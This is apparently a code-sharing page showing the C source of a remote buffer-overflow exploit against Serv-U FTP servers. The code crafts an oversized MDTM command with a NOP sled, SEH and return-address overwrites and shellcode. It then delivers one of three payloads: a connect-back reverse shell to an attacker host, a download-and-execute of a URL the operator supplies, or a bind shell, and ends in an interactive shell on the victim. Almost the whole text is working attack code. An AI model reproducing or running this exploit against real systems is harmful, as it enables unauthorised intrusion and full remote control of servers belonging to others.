📄 servu.c
字号:
case 'p':
pPass = argv[i+1];
break;
case 'u':
pUser=argv[i+1];
break;
case 's':
shport=atoi(argv[i+1]);
break;
case 'c':
cbHost=argv[i+1];
bCb=TRUE;
break;
case 'd':
url = argv[i+1];
bUrl=TRUE;
break;
}
}
if((!ip) || (!user) || (!pass))
{
usage(argv[0]);
printf("[-] Invalid parameter.\n");
return -1;
}
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
{
usage(argv[0]);
printf("[-] Invalid type.\n");
return -1;
}
if(iPort <1 || iPort >65535 || shport <1 || shport > 65535)
{
usage(argv[0]);
printf("[-] Invalid port.\n");
return -1;
}
if(bUrl)
{
if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255)
{
usage(argv[0]);
printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n");
return -1;
}
}
if(strstr(targets[iType].szDescription, "2.x"))
{
b2x = TRUE;
printf("[*] Attack Target is Serv-U 2.x.\r\n");
}
else
{
printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n");
}
_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
user[sizeof(user)-1]='\0';
_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
pass[sizeof(pass)-1]='\0';
szSend[0] = user; //user
szSend[1] = pass; //pass
szSend[2] = penetrate; //pentrate
szSend[3] = szCommand; //shellcode
// Penetrate through the firewall.
if(bCb && shport > 1024)
{
strncpy(cbHost2, cbHost, 20);
for(i=0;i<strlen(cbHost); i++)
{
if(cbHost[i] == '.')
cbHost2[i] = ',';
}
sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate);
}
else
{
sprintf(penetrate,"TYPE I\r\n");
}
// fill the "MDTM" command
strcpy(szCommand, "MDTM 20031111111111+");
// fill the egg
for(i=0; i<SEH_OFFSET; i++)
{
strcat(szCommand, "\x90");
}
// ret addr
if(b2x)
{
// fill the egg
if(strstr(targets[iType].szDescription, "<"))
{
j = 8;
}
else
{
j = 4;
}
for(i=0; i<j; i++)
{
strcat(szCommand, "\x90");
}
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4);
// fill the decode
strcat(szCommand, decode);
}
else
{
// fill the seh
for(i=0; i<0x10*1; i+=8)
//for(i=0; i<1; i++)
{
memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4);
memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
}
// fill the decode
strcat(szCommand, decode2);
}
// fill the space
strcat(szCommand, " ");
// fill the egg
for(i=0; i<0x10; i++)
{
strcat(szCommand, "\x90");
}
// fill the shellcode start sign
strcat(szCommand, sc_start);
// fill the shellcode
if(bCb)
{
// connectback shellcode
shport2 = htons(shport)^(u_short)0x9999;
cbip = inet_addr(cbHost)^0x99999999;
memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
memcpy(&cbsc[IP_OFFSET], &cbip, 4);
strcat(szCommand, cbsc);
}
else
if(bUrl)
{
memset(downloadurl, 0, sizeof(downloadurl));
// download url exec shellcode
for(i=0;i<strlen(url);i++)
{
downloadurl[i] = url[i] ^ 0x99;
}
downloadurl[i] ^= 0x99;
strcat(szCommand, dusc);
strcat(szCommand, downloadurl);
}
else
{
// rebind shellcode
shport2 = htons(shport)^(u_short)0x9999;
memcpy(&sc[BIND_OFFSET], &shport2, 2);
strcat(szCommand, sc);
}
// fill the shellcode end sign
strcat(szCommand, sc_end);
// send end
strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand))
{
printf("[-] stack buffer overflow.\n");
return -1;
}
//printf("send size %d:%s", strlen(szCommand), szCommand);
//printf("buffsize %d\r\n", strlen(szCommand)-5-2);
#ifndef UNIX
__try
#endif
{
#ifndef UNIX
if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
{
printf("[-] WSAStartup error:%d\n", WSAGetLastError());
__leave;
}
#endif
s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(s == INVALID_SOCKET)
{
printf("[-] Create socket failed:%d",GetLastError());
__leave;
}
sa.sin_family=AF_INET;
sa.sin_port=htons((USHORT)iPort);
#ifndef UNIX
sa.sin_addr.S_un.S_addr=inet_addr(ip);
#else
sa.sin_addr.s_addr=inet_addr(ip);
#endif
setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
if(iErr == SOCKET_ERROR)
{
printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
__leave;
}
printf("[+] Connect to %s:%d success.\n", ip, iPort);
if(bCb)
{
Sleep(500);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family=AF_INET;
#ifndef UNIX
server.sin_addr.S_un.S_addr=inet_addr(cbHost);
//server.sin_addr.s_addr=INADDR_ANY;
#else
server.sin_addr.s_addr=inet_addr(cbHost);
#endif
server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1;
setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
{
printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
printf("[-] You must run nc get the shell.\n");
bLocal = FALSE;
//closesocket(s2);
//__leave;
}
else
{
printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
listen(s2, 1);
}
}
for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
{
memset(szRecvBuff, 0, sizeof(szRecvBuff));
iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
__leave;
}
printf("[+] Recv: %s", szRecvBuff);
if(szRecvBuff[0] == '5')
{
printf("[-] Server return a error Message.\r\n");
__leave;
}
iErr = send(s, szSend[i], strlen(szSend[i]),0);
if(iErr == SOCKET_ERROR)
{
printf("[-] Send buffer error:%d.\n", WSAGetLastError());
__leave;
}
if(i==sizeof(szSend)/sizeof(szSend[0])-1)
printf("[+] Send shellcode %d bytes.\n", iErr);
else
printf("[+] Send: %s", szSend[i]);
}
if(bUrl)
{
printf("[+] Target Download the file and exec: %s\r\n", url);
printf("[+] Success? Maybe!\r\n");
}
else
{
printf("[+] If you don't have a shell it didn't work.\n");
if(bCb)
{
if(bLocal)
{
printf("[+] Wait for shell...\n");
len = sizeof(client);
s3 = accept(s2, (struct sockaddr*)&client, &len);
if(s3 != INVALID_SOCKET)
{
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s3);
}
}
}
else
{
printf("[+] Connect to shell...\n");
Sleep(1000);
s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
server.sin_family = AF_INET;
server.sin_port = htons(shport);
server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
if(ret!=0)
{
printf("[-] Exploit seem failed.\n");
__leave;
}
printf("[+] Exploit success! Good luck! :)\n");
printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
shell(s2);
}
}
}
#ifdef UNIX
exit_try:
#endif
#ifndef UNIX
__finally
#endif
{
if(s != INVALID_SOCKET) closesocket(s);
if(s2 != INVALID_SOCKET) closesocket(s2);
if(s3 != INVALID_SOCKET) closesocket(s3);
#ifndef UNIX
WSACleanup();
#endif
}
return 0;
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -